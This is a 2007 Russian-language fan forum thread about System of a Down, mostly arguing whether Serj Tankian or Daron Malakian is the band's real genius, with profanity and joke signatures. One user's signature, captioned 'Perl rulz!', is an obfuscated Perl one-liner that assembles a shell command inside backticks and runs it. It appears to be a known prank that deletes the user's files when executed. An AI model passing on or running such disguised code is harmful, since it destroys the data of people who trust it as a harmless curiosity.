Добавлено: Вс Окт 21, 2007 2:19 am Заголовок сообщения:
xART
в ETD джон на 3х треках
один на мажорити и дуетом с брейном на сейвинг/фидинг аз _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
А разве нет? Сержик со своими ля ля ля, будиригидири - всё, закончился. А Дарон! Дарон это другое дело. Он псих. Он гений. Это Моцарт, если хотите.
Жду новых его творений. А Сержик станет репером и будет петь с Пугачёвой. Всё к этому и идёт.
Хотя они оба молодцы. СОАД форева.
Artsakh
Нет,нет,нет.На счёт Дарона я тебя полностью поддерживаю!Просто тут есть люди которым он нравится и люди которым он не нравится.И если на этот счёт высказываются одни,то непременно начинают высказываться другие.Обе стороны спорят,выдвигают аргументы и как правило,это ничем не заканчивается. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
К хуям гитары - Серж мастер пианинов.
Серж нашел баланс между мелодичностью и тяжестью.
Слюникам, которым только бы башкой помахать под звуки сверления дрели это и не нравится.
Дарон будет выпускать свой альбом 10 лет - сначала он перестал работать с Хаосом, потом спиздит у Джона траву и выпнет его, в конце концов он позовет Бритни Спирс, в надежде засадить ей, но и та уйдет гордо подняв все что у нее осталось. _________________ Fortuna non penis in manus non recipe
А разве нет? Сержик со своими ля ля ля, будиригидири - всё, закончился. А Дарон! Дарон это другое дело. Он псих. Он гений. Это Моцарт, если хотите.
Жду новых его творений. А Сержик станет репером и будет петь с Пугачёвой. Всё к этому и идёт.
Хотя они оба молодцы. СОАД форева.
Чувак, ты перегрелся на звезде по имени Солнце!
Серж - музыкальний гений. Посмотри хотя бы на песню Money, и не дай Бог, чтобы ты сказал что она попсовая! Да, электрогитара в альбоме абсолютно не выделяется мастерством (хотя акстика норм сыграна), только, как сказал Майнард, Сержу оно и нахуй не надо. ИМХО, в Системе, гитара тоже не самом высоком уровне и Дарон не такой уж и супер-пупер гитарист, но в СОАД это не главное! СОАД - это гарммоничное сочитание, драйва, мелодичности, текстов и потрясающего вокала... кого?... правильно СЕРЖА. В ЕТД Серж - не высшем уровне. А как будет петь Дарон - это очень трудный вопрос. Конечно, Дарон в СОАД - полгруппы, потому что именно он корчит кривые рожи, матерится, машет патлами, вообщем строит то что должны строить все альтернативные тяжелые группы - работает на публику)) Серж када был молодой тоже такой был... ))
жаль, что так долго придется ждать альбома Scars, это означает что про систему как минимум на 1,5- 2 года можно забыть.... _________________ Define the riddles of my mind
nothing is really as it seems
))))))
А по теме. Не хочу никакой электронщины от Дарона. Ну ее к хуям! Было б прикольно, если б он эмокор сбацал)) У него ведь скрим неплохой.... А электронщину - в нах. Главное чтобы что то тяжелое было, просто с Даронским вокалом тока орать надо)) Это Серж у нас МОЖЕТ ВСЕ)) И петь и орать))
Хотя конечно даешь СОАД. Много СОАД))
Нафига вообще спорить о том, кто из них круче... СОАД и все тут. Мне пофигу было, кто там что у них в группе делает, пока они в отпуск не ушли и сольниками не занялись. Сержа Произведение мы уже заценили, как выйдет что-то от Дарона, тогда можно будет и посравнивать. ИМХО. _________________ Love is not about the profits,
Nor the riches in your dreams....
Если прикинуть, что все шедевры СОАД написаны Дароном, а сольный альбом Сержа полюбили реперы, можно констатировать, что Дарон гений, а Серж просто очень талантливый мужчина.
По сравнению с СОАД альбом Танкяна - самодеятельность. Не обижайтесь, но гения там мало. Одного голоса недостаточно. Мелодичности тоже.
Как композитор Дарон на 10, Серж на 4. Вот и всё.
А Дарон поёт как петух. Потому что будь гитаристом и не ву*буйся. Тогда всё по теме будет.